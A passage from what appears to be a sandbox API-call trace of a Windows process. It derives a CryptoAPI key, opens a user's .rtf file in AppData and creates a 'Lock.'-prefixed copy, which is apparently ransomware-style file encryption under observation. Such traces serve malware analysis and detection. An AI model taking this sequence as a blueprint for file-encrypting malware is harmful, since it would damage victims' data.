dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0240.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0240.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0240.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0240.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0240.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0240.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0240.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0240.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0240.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0240.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0240.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0240.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0240.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0240.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51490 [0240.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51490, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0240.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.915] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0240.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0240.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0240.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0240.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0240.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0240.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0240.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0240.916] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87050, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87590) returned 1 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0240.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0240.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0240.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0240.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0240.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0240.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0240.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0240.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0240.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0240.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0240.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0240.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0240.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0240.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0240.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0240.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0240.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0240.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0240.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.920] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0240.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0240.920] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0240.920] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0240.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69ac8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0240.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0240.920] CryptDestroyHash (hHash=0xa87050) returned 1 [0240.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0240.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0240.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.921] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/yYa4EeIK4zJ1bJ59OB.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\yya4eeik4zj1bj59ob.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0240.921] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.921] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0240.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0240.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0240.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0240.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0240.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0240.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0240.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0240.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0240.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0240.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0240.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0240.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0240.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0240.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0240.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0240.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0240.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0240.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0240.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0240.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0240.922] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0240.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0240.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0240.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0240.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0240.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.924] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.yYa4EeIK4zJ1bJ59OB.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.yya4eeik4zj1bj59ob.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0240.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0240.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0240.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0240.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0240.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0240.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0240.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0240.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0240.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0240.933] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0240.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0240.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0240.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0240.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0240.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0240.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0240.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0240.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0240.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0240.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0240.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0240.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0240.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0240.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0240.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0240.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0240.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe59020 [0240.935] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0240.935] ReadFile (in: hFile=0x2a0, 